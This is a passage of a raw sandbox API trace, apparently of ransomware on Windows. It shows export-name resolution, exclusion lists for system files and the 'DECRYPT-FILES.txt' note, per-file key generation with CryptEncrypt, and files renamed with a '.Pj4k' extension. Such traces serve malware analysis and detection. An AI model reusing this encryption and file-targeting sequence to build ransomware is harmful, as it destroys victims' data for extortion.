(lpString="ENDUPDATERESOURCEA") returned 18 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.009] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.009] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.009] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.009] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.009] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.009] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.009] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.010] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.010] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.010] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.010] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.010] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.010] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.010] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.010] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.010] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.010] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\MxmcYlbU.docx") returned 71 [0084.010] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\MxmcYlbU.docx.Pj4k") returned 76 [0084.010] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\MxmcYlbU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\mxmcylbu.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\MxmcYlbU.docx.Pj4k" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\mxmcylbu.docx.pj4k"), dwFlags=0x0) returned 1 [0084.011] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.011] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.011] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.011] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243cd420, ftCreationTime.dwHighDateTime=0x1d4d2ca, ftLastAccessTime.dwLowDateTime=0xb9e43770, ftLastAccessTime.dwHighDateTime=0x1d4ca9b, ftLastWriteTime.dwLowDateTime=0xb9e43770, ftLastWriteTime.dwHighDateTime=0x1d4ca9b, nFileSizeHigh=0x0, nFileSizeLow=0x42e7, dwReserved0=0x0, dwReserved1=0x0, cFileName="S46h3QD3.ppt", cAlternateFileName="")) returned 1 [0084.011] lstrcmpiW (lpString1="S46h3QD3.ppt", lpString2="DECRYPT-FILES.txt") returned 1 [0084.011] lstrcmpiW (lpString1="S46h3QD3.ppt", lpString2="autorun.inf") returned 1 [0084.011] lstrcmpiW (lpString1="S46h3QD3.ppt", lpString2="boot.ini") returned 1 [0084.011] lstrcmpiW (lpString1="S46h3QD3.ppt", lpString2="desktop.ini") returned 1 [0084.011] lstrcmpiW (lpString1="S46h3QD3.ppt", lpString2="ntuser.dat") returned 1 [0084.011] lstrcmpiW (lpString1="S46h3QD3.ppt", lpString2="iconcache.db") returned 1 [0084.011] lstrcmpiW (lpString1="S46h3QD3.ppt", lpString2="bootsect.bak") returned 1 [0084.011] lstrcmpiW (lpString1="S46h3QD3.ppt", lpString2="ntuser.dat.log") returned 1 [0084.011] lstrcmpiW (lpString1="S46h3QD3.ppt", lpString2="thumbs.db") returned -1 [0084.012] lstrcmpiW (lpString1="S46h3QD3.ppt", lpString2="Bootfont.bin") returned 1 [0084.012] lstrlenW (lpString="S46h3QD3.ppt") returned 12 [0084.012] lstrcmpiW (lpString1="ppt", lpString2="lnk") returned 1 [0084.012] lstrcmpiW (lpString1="ppt", lpString2="exe") returned 1 [0084.012] lstrcmpiW (lpString1="ppt", lpString2="sys") returned -1 [0084.012] lstrcmpiW (lpString1="ppt", lpString2="dll") returned 1 [0084.012] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0084.012] lstrlenW (lpString="S46h3QD3.ppt") returned 12 [0084.012] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0084.012] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="S46h3QD3.ppt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\S46h3QD3.ppt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\S46h3QD3.ppt" [0084.012] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\S46h3QD3.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\s46h3qd3.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.012] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=17127) returned 1 [0084.012] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.012] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.012] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.013] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.013] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.013] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.013] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.014] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.014] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.014] CloseHandle (hObject=0x42c) returned 1 [0084.014] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.014] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.015] CloseHandle (hObject=0x0) returned 0 [0084.015] CloseHandle (hObject=0x428) returned 1 [0084.015] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.015] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.016] GetTickCount () returned 0x114d77b [0084.016] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.016] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.016] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.016] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.016] lstrlenA (lpString="kernel32.dll") returned 12 [0084.016] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.016] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.017] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.017] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.017] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.017] lstrlenA (lpString="ADDATOMA") returned 8 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.017] lstrlenA (lpString="ADDATOMW") returned 8 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.017] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.017] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.017] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.017] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.017] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.017] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.017] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.017] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.017] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.017] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.017] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.017] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.017] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.017] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.018] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.018] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.018] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.018] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.018] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.018] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.018] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.018] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.018] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.018] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.018] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.018] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.019] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.019] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.019] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.019] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.019] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.019] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.019] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.019] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.019] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.019] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.019] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.019] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.019] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.019] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.019] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.019] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.019] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.019] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.019] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.019] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.020] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.020] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.020] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.020] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.020] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.020] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.020] lstrlenA (lpString="BEEP") returned 4 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.020] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.020] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.020] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.020] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.020] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.020] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.020] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.020] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.020] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.020] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.020] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.020] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.021] lstrlenA (lpString="CANCELIO") returned 8 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.021] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.021] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.021] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.021] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.021] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.021] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.021] lstrlenA (lpString="CHECKELEVATION") returned 14 